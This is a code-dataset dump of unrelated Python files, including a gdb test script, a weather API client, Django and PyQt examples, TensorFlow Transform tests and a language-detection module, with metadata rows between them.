] | 4 | 2016-07-16T01:35:30.000Z | 2020-06-18T05:37:33.000Z | test/lit/memberfield/__init__.py | sivachandra/gala | 6d7e5fd3cf3c319062a3985dbffd791944e180e9 | [
"Apache-2.0"
] | 7 | 2015-06-26T19:24:30.000Z | 2015-08-18T18:16:11.000Z | test/lit/memberfield/__init__.py | sivachandra/gala | 6d7e5fd3cf3c319062a3985dbffd791944e180e9 | [
"Apache-2.0"
] | null | null | null | import gdb
def print_field(f):
    print("========")
    print("name: %s" % f.name)
    print("type: %s" % f.type)
    if hasattr(f, "bitpos"):
        print("bitpos: %d" % f.bitpos)
    else:
        print("No bitpos attribute.")
    print("bitsize: %d" % f.bitsize)
    print("parent_type: %s" % f.parent_type)
    print("is_base_class: %s" % f.is_base_class)
    print("artificial: %s" % f.artificial)
    if hasattr(f, "enumval"):
        print("enumval: %d" % f.enumval)
    else:
        print("No enumval attribute.")

derived = gdb.lookup_type("Derived")
for f in derived.fields():
    print_field(f)

enum = gdb.lookup_type("EnumType")
for f in enum.fields():
    print_field(f)
| 23.962963 | 46 | 0.630603 | 97 | 647 | 4.092784 | 0.309278 | 0.025189 | 0.083123 | 0.085642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173107 | 647 | 26 | 47 | 24.884615 | 0.742056 | 0 | 0 | 0.173913 | 0 | 0 | 0.264297 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.086957 | 0.608696 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
9f3b23013912e3d6b5ff12494cd3c60f642390af | 316 | py | Python | Aula07/03EstruturaDeRepeticaoFor.py | gutoffline/curso-python-2021 | 4a9a5f11188ad734402d1dafa7ea627179e7079b | [
"MIT"
] | null | null | null | Aula07/03EstruturaDeRepeticaoFor.py | gutoffline/curso-python-2021 | 4a9a5f11188ad734402d1dafa7ea627179e7079b | [
"MIT"
] | null | null | null | Aula07/03EstruturaDeRepeticaoFor.py | gutoffline/curso-python-2021 | 4a9a5f11188ad734402d1dafa7ea627179e7079b | [
"MIT"
] | null | null | null | """
for x in range(10):
    print(x)

for x in range(20, 30):
    print(x)

for x in range(10, 100, 5):
    print(x)

for x in range(10, 1, -1):
    print(x)

print(range(10))
"""

frutas = ["maçã", "laranja", "banana", "morango"]

for x in range(len(frutas)):
    print(frutas[x])

for fruta in frutas:
    print(fruta)
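
# For index/value pairs, enumerate() is the idiomatic alternative to
# range(len(...)) -- an extra (commented) example, not part of the original:
#
#   for i, fruta in enumerate(frutas):
#       print(i, fruta)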
| 13.73913 | 49 | 0.582278 | 56 | 316 | 3.285714 | 0.321429 | 0.108696 | 0.163043 | 0.298913 | 0.369565 | 0.298913 | 0.206522 | 0 | 0 | 0 | 0 | 0.073171 | 0.221519 | 316 | 22 | 50 | 14.363636 | 0.674797 | 0.528481 | 0 | 0 | 0 | 0 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f4fb4aa07286decc81511426c6486ee3fe2e5ca | 4,704 | py | Python | datagokr/kma/VilageFcstInfoService_2_0.py | uujei/datagokr | 308f5151f819010f2c4e174a6ef84d83d3bea922 | [
"MIT"
] | null | null | null | datagokr/kma/VilageFcstInfoService_2_0.py | uujei/datagokr | 308f5151f819010f2c4e174a6ef84d83d3bea922 | [
"MIT"
] | null | null | null | datagokr/kma/VilageFcstInfoService_2_0.py | uujei/datagokr | 308f5151f819010f2c4e174a6ef84d83d3bea922 | [
"MIT"
] | null | null | null | import logging
import os
from datetime import datetime
from enum import Enum
from typing import Optional
from pydantic import BaseModel, Field, HttpUrl, SecretStr, ValidationError
from ..DataGoKr import DataGoKr
# logging
logger = logging.getLogger(__file__)
# debug only
KMA_API_KEY = os.getenv("KMA_API_KEY")
################################################################################
# Types
################################################################################
# (Type)
class DataType(str, Enum):
    # Only JSON available yet
    json = "JSON"


# (Type)
class VilageFcstVersionFtype(str, Enum):
    ODAM = "ODAM"
    VSRT = "VSRT"
    SHRT = "SHRT"


################################################################################
# [Abstract] Abstract for VilageFcst
################################################################################
class VilageFcstInfo(DataGoKr):
    __version__ = "2.0"

    baseUrl: HttpUrl = "http://apis.data.go.kr/1360000/VilageFcstInfoService_2.0"
    dataType: Optional[DataType] = "JSON"  # Only JSON available yet.
    serviceKey: str = KMA_API_KEY


################################################################################
# [API] Ultra short-term observations (UltraSrtNcst)
################################################################################
# Output Model
class UltraSrtNcstModel(BaseModel):
    baseDate: str
    baseTime: str
    T1H: Optional[float]  # 10 decimal
    RN1: Optional[str]    # 8 code
    UUU: Optional[float]  # 12 float
    VVV: Optional[float]  # 12 float
    REH: Optional[int]    # 8 int
    PTY: Optional[int]    # 4 code
    VEC: Optional[float]  # 10 decimal
    WSD: Optional[float]  # 10 decimal


# API
class UltraSrtNcst(VilageFcstInfo):
    __RecordModel__ = UltraSrtNcstModel
    __index_names__ = None
    __key_name__ = "category"
    __value_name__ = "obsrValue"

    route: str = "getUltraSrtNcst"
    base_date: str = datetime.now().strftime("%Y%m%d")
    base_time: str = "0500"
    nx: int = 64
    ny: int = 118


################################################################################
# [API] Ultra short-term forecast (UltraSrtFcst)
################################################################################
# Output Model
class UltraSrtFcstModel(BaseModel):
    baseDate: str
    baseTime: str
    fcstDate: str
    fcstTime: str
    T1H: Optional[float]  # 10 decimal
    RN1: Optional[str]    # 8 code
    SKY: Optional[int]    # 4 code
    UUU: Optional[float]  # 12 float
    VVV: Optional[float]  # 12 float
    REH: Optional[int]    # 8 int
    PTY: Optional[int]    # 4 code
    LGT: Optional[str]    # 4 code
    VEC: Optional[float]  # 10 decimal
    WSD: Optional[float]  # 10 decimal


# API
class UltraSrtFcst(VilageFcstInfo):
    __RecordModel__ = UltraSrtFcstModel
    __index_names__ = ["fcstDate", "fcstTime"]
    __key_name__ = "category"
    __value_name__ = "fcstValue"

    route: str = "getUltraSrtFcst"
    base_date: str = datetime.now().strftime("%Y%m%d")
    base_time: str = "0500"
    nx: int = 64
    ny: int = 118


################################################################################
# [API] Short-term village forecast (VilageFcst)
################################################################################
# Output Model
class VilageFcstModel(BaseModel):
    baseDate: str
    baseTime: str
    fcstDate: str
    fcstTime: str
    POP: Optional[int]    # 8 int
    PTY: Optional[int]    # 4 code
    PCP: Optional[str]    # 8 code
    REH: Optional[int]    # 8 int
    SNO: Optional[str]    # 8 code
    SKY: Optional[int]    # 4 code
    TMP: Optional[float]  # 10 decimal
    TMN: Optional[float]  # 10 decimal
    TMX: Optional[float]  # 10 decimal
    UUU: Optional[float]  # 12 float
    VVV: Optional[float]  # 12 float
    WAV: Optional[float]  # 8 int
    VEC: Optional[float]  # 10 decimal
    WSD: Optional[float]  # 10 decimal


# API
class VilageFcst(VilageFcstInfo):
    __RecordModel__ = VilageFcstModel
    __index_names__ = ["fcstDate", "fcstTime"]
    __key_name__ = "category"
    __value_name__ = "fcstValue"

    route: str = "getVilageFcst"
    base_date: str = datetime.now().strftime("%Y%m%d")
    base_time: str = "0500"
    nx: int = 64
    ny: int = 118
################################################################################
# [API] Short-term forecast numerical model version
################################################################################
# Output Model
# Named *Model here, matching the other record models in this file, so it no
# longer shares a name with (and gets shadowed by) the API class below.
class VilageFcstVersionModel(BaseModel):
    filetype: VilageFcstVersionFtype
    version: str


# API
class VilageFcstVersion(VilageFcstInfo):
    __RecordModel__ = VilageFcstVersionModel

    route: str = "getFcstVersion"
    ftype: VilageFcstVersionFtype = "ODAM"
    basedatetime: str = datetime.now().strftime("%Y%m%d0800")
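

# Illustrative sketch: the API classes above are pydantic models, so a request
# object can be configured by overriding the declared fields. How the request
# is actually dispatched depends on the DataGoKr base class (not shown here),
# so only construction is shown:
#
#   ncst = UltraSrtNcst(base_date="20230101", base_time="0500", nx=60, ny=127)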
| 28.682927 | 81 | 0.528699 | 453 | 4,704 | 5.309051 | 0.280353 | 0.097297 | 0.068607 | 0.100624 | 0.458212 | 0.429106 | 0.419127 | 0.419127 | 0.419127 | 0.341372 | 0 | 0.024707 | 0.182611 | 4,704 | 163 | 82 | 28.858896 | 0.60078 | 0.119048 | 0 | 0.514563 | 0 | 0 | 0.087512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.067961 | 0 | 0.980583 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9f513a1848907a84153b93f6379a41b3912f5550 | 1,807 | py | Python | test_hig.py | xiaohan2012/lst | 793944d1dd8235adbe2f651270ab12e46ff8f6f7 | [
"MIT"
] | 1 | 2016-07-05T13:10:27.000Z | 2016-07-05T13:10:27.000Z | test_hig.py | xiaohan2012/lst | 793944d1dd8235adbe2f651270ab12e46ff8f6f7 | [
"MIT"
] | null | null | null | test_hig.py | xiaohan2012/lst | 793944d1dd8235adbe2f651270ab12e46ff8f6f7 | [
"MIT"
] | null | null | null | import unittest
import networkx as nx
from nose.tools import assert_equal, assert_raises, \
    assert_true

from .util import json_load
from .test_util import make_path

from hig import construct_hig_from_interactions
from interactions import InteractionsUtil as IU


class HIGTest(unittest.TestCase):
    def setUp(self):
        self.interactions = IU.clean_interactions(
            json_load(
                make_path('test/data/enron_test.json')
            )
        )

    def test_construct_hig(self):
        hig = construct_hig_from_interactions(
            self.interactions
        )
        a, b, c, d, e, f = ('A', 'B', 'C', 'D', 'E', 'F')
        assert_equal(
            sorted(
                range(1, 7) +
                [a, b, c, d, e, f, 'XXX']
            ),
            sorted(hig.nodes()))
        print hig.edges()
        assert_equal(
            sorted(
                [(a, 1), (1, b), (1, c), (1, d),
                 (a, 2), (2, f),
                 (d, 3), (3, e),
                 (a, 4), (4, b),
                 (d, 5), (5, f),
                 (6, u'XXX'), (u'XXX', 6)
                 ]),
            sorted(hig.edges())
        )

    def test_construct_hig_interacting_ids(self):
        self.interactions.append({'sender_id': 1,
                                  'recipient_ids': [1],
                                  'message_id': 7})
        assert_raises(ValueError,
                      construct_hig_from_interactions,
                      self.interactions)

    def test_pagerank_on_hig(self):
        pr = nx.pagerank(
            construct_hig_from_interactions(self.interactions)
        )
        assert_true(pr['A'] < pr['F'])
        assert_true(pr['A'] < pr['B'])
        assert_true(pr['A'] < pr['C'])
        assert_true(pr['A'] < pr['D'])
| 30.116667 | 62 | 0.484781 | 207 | 1,807 | 4.033816 | 0.304348 | 0.086228 | 0.076647 | 0.134132 | 0.251497 | 0.179641 | 0 | 0 | 0 | 0 | 0 | 0.017056 | 0.383509 | 1,807 | 59 | 63 | 30.627119 | 0.732496 | 0 | 0 | 0.075472 | 0 | 0 | 0.044272 | 0.013835 | 0 | 0 | 0 | 0 | 0.169811 | 0 | null | null | 0 | 0.132075 | null | null | 0.018868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f5b476a26d33e866185f1fc2f1015578a813124 | 593 | py | Python | base/shortener/admin.py | elijah74/django-url-shortener | 8934b46539748957b4be46945bea159640911434 | [
"BSD-3-Clause"
] | null | null | null | base/shortener/admin.py | elijah74/django-url-shortener | 8934b46539748957b4be46945bea159640911434 | [
"BSD-3-Clause"
] | null | null | null | base/shortener/admin.py | elijah74/django-url-shortener | 8934b46539748957b4be46945bea159640911434 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import Shortener
@admin.register(Shortener)
class ShortenerAdmin(admin.ModelAdmin):
    list_display = ('id', 'short_url', 'link_url', 'status', 'created')
    fields = ('short_url', 'link_url', 'status', 'created', 'modified')
    readonly_fields = ('short_url', 'created', 'modified')

    def save_formset(self, request, form, formset, change):
        # formset.save(commit=False) returns a list of unsaved instances, so
        # strip and save each one (the original set link_url on the list itself).
        instances = formset.save(commit=False)
        for instance in instances:
            instance.link_url = instance.link_url.rstrip()
            instance.save()
        formset.save_m2m()
| 31.210526 | 71 | 0.693086 | 70 | 593 | 5.642857 | 0.571429 | 0.070886 | 0.060759 | 0.075949 | 0.141772 | 0.141772 | 0 | 0 | 0 | 0 | 0 | 0.004032 | 0.163575 | 593 | 18 | 72 | 32.944444 | 0.792339 | 0.035413 | 0 | 0 | 0 | 0 | 0.164912 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.25 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9f6fd9b78959476700ebfd2a923895af3dc7f59d | 250 | py | Python | gui/examples/hello_0.py | t20100/silx-training | 409656479c7fdc9f1e895c6f3f0530c7eb89cbc1 | [
"CC-BY-4.0"
] | 7 | 2017-05-02T10:03:12.000Z | 2021-06-28T14:11:32.000Z | gui/examples/hello_0.py | t20100/silx-training | 409656479c7fdc9f1e895c6f3f0530c7eb89cbc1 | [
"CC-BY-4.0"
] | 23 | 2016-11-21T17:55:11.000Z | 2021-11-24T13:43:13.000Z | gui/examples/hello_0.py | t20100/silx-training | 409656479c7fdc9f1e895c6f3f0530c7eb89cbc1 | [
"CC-BY-4.0"
] | 13 | 2016-11-17T10:47:22.000Z | 2022-02-07T09:38:47.000Z | from PyQt5.QtWidgets import QApplication, QLabel, QMainWindow
app = QApplication([])
main_window = QMainWindow()
first_widget = QLabel('hello world !!!', parent=main_window)
main_window.setCentralWidget(first_widget)
main_window.show()
app.exec_() | 25 | 61 | 0.788 | 30 | 250 | 6.333333 | 0.6 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004405 | 0.092 | 250 | 10 | 62 | 25 | 0.832599 | 0 | 0 | 0 | 0 | 0 | 0.059761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f7018c0a4594a3537d02ec23d95b4ae17544c4d | 1,101 | py | Python | kolibri/logger/test/factory_logger.py | aronasorman/kolibri | 940672bc849cd0b26d7d84ee08a34f072c4f6cd6 | [
"MIT"
] | null | null | null | kolibri/logger/test/factory_logger.py | aronasorman/kolibri | 940672bc849cd0b26d7d84ee08a34f072c4f6cd6 | [
"MIT"
] | 2 | 2017-02-08T00:22:04.000Z | 2017-06-12T20:27:44.000Z | kolibri/logger/test/factory_logger.py | aronasorman/kolibri | 940672bc849cd0b26d7d84ee08a34f072c4f6cd6 | [
"MIT"
] | null | null | null | import datetime
import factory
import uuid
from kolibri.auth.test.test_api import FacilityUserFactory
from .. import models
class ContentSessionLogFactory(factory.DjangoModelFactory):

    class Meta:
        model = models.ContentSessionLog

    user = factory.SubFactory(FacilityUserFactory)
    content_id = uuid.uuid4().hex
    channel_id = uuid.uuid4().hex
    start_timestamp = datetime.datetime.now()


class ContentSummaryLogFactory(factory.DjangoModelFactory):

    class Meta:
        model = models.ContentSummaryLog

    user = factory.SubFactory(FacilityUserFactory)
    content_id = uuid.uuid4().hex
    channel_id = uuid.uuid4().hex
    start_timestamp = datetime.datetime.now()


class ContentRatingLogFactory(factory.DjangoModelFactory):

    class Meta:
        model = models.ContentRatingLog

    user = factory.SubFactory(FacilityUserFactory)
    content_id = uuid.uuid4().hex
    channel_id = uuid.uuid4().hex


class UserSessionLogFactory(factory.DjangoModelFactory):

    class Meta:
        model = models.UserSessionLog

    user = factory.SubFactory(FacilityUserFactory)
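

# Illustrative factory_boy usage sketch (inside a test with database access):
#
#   log = ContentSessionLogFactory()                # build and save one log row
#   logs = ContentRatingLogFactory.create_batch(3)  # or several at once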
| 23.425532 | 59 | 0.745686 | 109 | 1,101 | 7.449541 | 0.302752 | 0.044335 | 0.081281 | 0.103448 | 0.618227 | 0.618227 | 0.396552 | 0.396552 | 0.396552 | 0.396552 | 0 | 0.006593 | 0.173479 | 1,101 | 46 | 60 | 23.934783 | 0.885714 | 0 | 0 | 0.551724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.172414 | 0 | 0.862069 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9f71a197572466c48094262987b091e399a3df17 | 237 | py | Python | lists/urls.py | Tawakalt/todo_list | 184293acf62771f60c6fdc46271634ae89684775 | [
"MIT"
] | null | null | null | lists/urls.py | Tawakalt/todo_list | 184293acf62771f60c6fdc46271634ae89684775 | [
"MIT"
] | 5 | 2020-06-06T01:03:12.000Z | 2022-02-10T10:01:49.000Z | lists/urls.py | Tawakalt/todo_list | 184293acf62771f60c6fdc46271634ae89684775 | [
"MIT"
] | 1 | 2020-01-20T12:44:56.000Z | 2020-01-20T12:44:56.000Z | from django.urls import path
from . import views
urlpatterns = [
    path('new', views.new_list, name='new_list'),
    path('<list_id>/', views.view_list, name='view_list'),
    path('users/<email>/', views.my_lists, name='my_lists'),
] | 29.625 | 60 | 0.670886 | 35 | 237 | 4.342857 | 0.457143 | 0.092105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139241 | 237 | 8 | 61 | 29.625 | 0.745098 | 0 | 0 | 0 | 0 | 0 | 0.218487 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f7961daf22e80aa849ae0a67694bcc8b1f9979d | 348 | py | Python | setup.py | anthonyvallee/bettejpeg | eaa809f4d07d85274cd4ee4671352ff069f94307 | [
"Apache-2.0"
] | 1 | 2020-03-29T13:12:32.000Z | 2020-03-29T13:12:32.000Z | setup.py | anthonyvallee/bettejpeg | eaa809f4d07d85274cd4ee4671352ff069f94307 | [
"Apache-2.0"
] | 2 | 2016-10-23T21:15:52.000Z | 2016-12-08T07:25:07.000Z | setup.py | RentAPlace/python-betterjpeg | eaa809f4d07d85274cd4ee4671352ff069f94307 | [
"Apache-2.0"
] | null | null | null | from setuptools import (find_packages, setup)
from rap import betterjpeg
setup(
    name=betterjpeg.__pkgname__,
    description=betterjpeg.__description__,
    version=betterjpeg.__version__,
    packages=["rap.betterjpeg"],
    entry_points="""
        [console_scripts]
        betterjpeg=rap.betterjpeg.betterjpeg:cli
    """
)
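
# Once installed (e.g. `pip install .` from the project root), the
# [console_scripts] entry point above exposes a `betterjpeg` command on PATH.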
| 23.2 | 49 | 0.686782 | 32 | 348 | 7 | 0.53125 | 0.116071 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215517 | 348 | 14 | 50 | 24.857143 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0.281437 | 0.11976 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f9602b2224dec858d62feca228f9bec5c6a8d6a | 2,320 | py | Python | tensorflow_transform/beam/tft_beam_io/beam_metadata_io_test.py | sswapnil2/transform | 54561ddb357ef752153dd569aad7cc2651b38ac2 | [
"Apache-2.0"
] | null | null | null | tensorflow_transform/beam/tft_beam_io/beam_metadata_io_test.py | sswapnil2/transform | 54561ddb357ef752153dd569aad7cc2651b38ac2 | [
"Apache-2.0"
] | null | null | null | tensorflow_transform/beam/tft_beam_io/beam_metadata_io_test.py | sswapnil2/transform | 54561ddb357ef752153dd569aad7cc2651b38ac2 | [
"Apache-2.0"
] | 1 | 2020-04-07T23:48:26.000Z | 2020-04-07T23:48:26.000Z | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for beam_metadata_io."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# GOOGLE-INITIALIZATION
import apache_beam as beam
from tensorflow_transform.beam.tft_beam_io import beam_metadata_io
from tensorflow_transform.beam.tft_beam_io import test_metadata
from tensorflow_transform.tf_metadata import metadata_io
import unittest
from tensorflow.python.framework import test_util
class BeamMetadataIoTest(test_util.TensorFlowTestCase):

  def testWriteMetadataNonDeferred(self):
    # Write metadata to disk using WriteMetadata PTransform.
    with beam.Pipeline() as pipeline:
      path = self.get_temp_dir()
      _ = (test_metadata.COMPLETE_METADATA
           | beam_metadata_io.WriteMetadata(path, pipeline))

    # Load from disk and check that it is as expected.
    metadata = metadata_io.read_metadata(path)
    self.assertEqual(metadata, test_metadata.COMPLETE_METADATA)

  def testWriteMetadataDeferred(self):
    # Write metadata to disk using WriteMetadata PTransform, combining
    # incomplete metadata with (deferred) complete metadata.
    with beam.Pipeline() as pipeline:
      path = self.get_temp_dir()
      deferred_metadata = pipeline | 'CreateDeferredMetadata' >> beam.Create(
          [test_metadata.COMPLETE_METADATA])
      metadata = beam_metadata_io.BeamDatasetMetadata(
          test_metadata.INCOMPLETE_METADATA, deferred_metadata)
      _ = metadata | beam_metadata_io.WriteMetadata(path, pipeline)

    # Load from disk and check that it is as expected.
    metadata = metadata_io.read_metadata(path)
    self.assertEqual(metadata, test_metadata.COMPLETE_METADATA)


if __name__ == '__main__':
  unittest.main()
| 36.825397 | 77 | 0.771983 | 298 | 2,320 | 5.785235 | 0.40604 | 0.046404 | 0.040603 | 0.064965 | 0.37819 | 0.356148 | 0.356148 | 0.356148 | 0.24826 | 0.24826 | 0 | 0.004117 | 0.1625 | 2,320 | 62 | 78 | 37.419355 | 0.88317 | 0.384914 | 0 | 0.275862 | 0 | 0 | 0.021383 | 0.015681 | 0 | 0 | 0 | 0 | 0.068966 | 1 | 0.068966 | false | 0 | 0.310345 | 0 | 0.413793 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9f9abf9bd659e3c5cd886d27c3067e12da0ea781 | 490 | py | Python | src/basic/check_type.py | xxzhwx/hello-python | 83bb01c146049d3c7f7fa9ed007abee054d004ef | [
"MIT"
] | null | null | null | src/basic/check_type.py | xxzhwx/hello-python | 83bb01c146049d3c7f7fa9ed007abee054d004ef | [
"MIT"
] | null | null | null | src/basic/check_type.py | xxzhwx/hello-python | 83bb01c146049d3c7f7fa9ed007abee054d004ef | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
@author: xxzhwx
'''
from types import IntType
def is_int_type(num):
    # Object identity comparison
    if type(num) is IntType:
        return True
    return False

def is_int_typeX(num):
    if isinstance(num, int):
        return True
    # if type(num) is int:
    #     return True
    return False

# Usage
print(is_int_type(1))
print(is_int_type(1.0))
print(is_int_type(''))
print(is_int_typeX(1))
print(is_int_typeX(1.0))
print(is_int_typeX('')) | 15.3125 | 28 | 0.606122 | 75 | 490 | 3.746667 | 0.333333 | 0.160142 | 0.213523 | 0.149466 | 0.298932 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019231 | 0.257143 | 490 | 32 | 29 | 15.3125 | 0.752747 | 0.195918 | 0 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.066667 | 0 | 0.466667 | 0.4 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9fa5fa2df40b29c75a161e9790ab053c973c7300 | 3,569 | py | Python | langsense/core.py | sneub/langsense | 7e194582f19bbd2b7c93f8a1ef5d96d4d9f5ae73 | [
"Apache-2.0"
] | null | null | null | langsense/core.py | sneub/langsense | 7e194582f19bbd2b7c93f8a1ef5d96d4d9f5ae73 | [
"Apache-2.0"
] | null | null | null | langsense/core.py | sneub/langsense | 7e194582f19bbd2b7c93f8a1ef5d96d4d9f5ae73 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from . import ruleset
import re
import operator
class LangSense(object):

    def detect(self, string, country_hint=None):
        if type(string) == str:
            text = string.decode('utf-8').lower()
        else:
            text = string.lower()

        shortlist_char = self._char_shortlist(text)
        shortlist_rules = self._rule_shortlist(text)
        shortlist_words = self._word_shortlist(text)
        shortlist_segments = self._segment_shortlist(text)

        result = {l: 0 for l in ruleset.RuleSet.language_list}
        for l in ruleset.RuleSet.language_list:
            try:
                result[l] += (shortlist_char[l] * ruleset.RuleSet.score_weights['char'])
            except Exception, _:
                pass
            try:
                result[l] += (shortlist_rules[l] * ruleset.RuleSet.score_weights['rule'])
            except Exception, _:
                pass
            try:
                result[l] += (shortlist_words[l] * ruleset.RuleSet.score_weights['word'])
            except Exception, _:
                pass
            try:
                result[l] += (shortlist_segments[l] * ruleset.RuleSet.score_weights['segment'])
            except Exception, _:
                pass

        sum_scores = sum([v for _, v in result.iteritems()])
        result = {k: float(v)/sum_scores for k, v in result.iteritems() if v > 0}

        if country_hint:
            country_hint = country_hint.decode('utf-8').upper()
            lang = ruleset.RuleSet.country_langs[country_hint]
            if lang in result:
                result[lang] *= ruleset.RuleSet.score_weights['hint']

        result = list(reversed(sorted(result.items(), key=operator.itemgetter(1))))
        return result

    def _char_shortlist(self, string):
        lang_shortlist = []
        for c in string:
            lang_shortlist = lang_shortlist + [(c, l) for (l, a) in ruleset.RuleSet.alphabets.iteritems() if c in a]

        langs = set([i[1] for i in lang_shortlist])
        master_langs = []
        bad_langs = []
        scores = {l: len(string) for l in langs}

        for l in langs:
            for c, _ in lang_shortlist:
                if c not in ruleset.RuleSet.alphabets[l]:
                    bad_langs.append(l)
                    scores[l] -= 1
            master_langs.append(l)

        scores = {k: s/len(string) for k, s in scores.iteritems()}
        return {k: v for k, v in scores.iteritems() if v > 0}

    def _rule_shortlist(self, string):
        lang_shortlist = []
        scores = {}
        for lang, rules in ruleset.RuleSet.word_rules.iteritems():
            for rule in rules:
                if re.search(rule, string):
                    lang_shortlist.append(lang)
                    if lang in scores:
                        scores[lang] += 1
                    else:
                        scores[lang] = 1
        return {k: scores[k] for k in list(set(lang_shortlist))}

    def _segment_shortlist(self, string):
        lang_shortlist = []
        scores = {}
        for lang, segments in ruleset.RuleSet.word_segments.iteritems():
            for segment in segments:
                if re.search(r'\w'+ segment + r'\b', string) or re.search(r'\b'+ segment + r'\w', string) or re.search(r'\w'+ segment + r'\w', string):
                    lang_shortlist.append(lang)
                    if lang in scores:
                        scores[lang] += 1
                    else:
                        scores[lang] = 1
        return {k: scores[k] for k in list(set(lang_shortlist))}

    def _word_shortlist(self, string):
        lang_shortlist = []
        scores = {}
        for lang, words in ruleset.RuleSet.words.iteritems():
            for word in words:
                if re.search(r'\b'+ word + r'\b', string):
                    lang_shortlist.append(lang)
                    if lang in scores:
                        scores[lang] += 1
                    else:
                        scores[lang] = 1
        return {k: scores[k] for k in list(set(lang_shortlist))}
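

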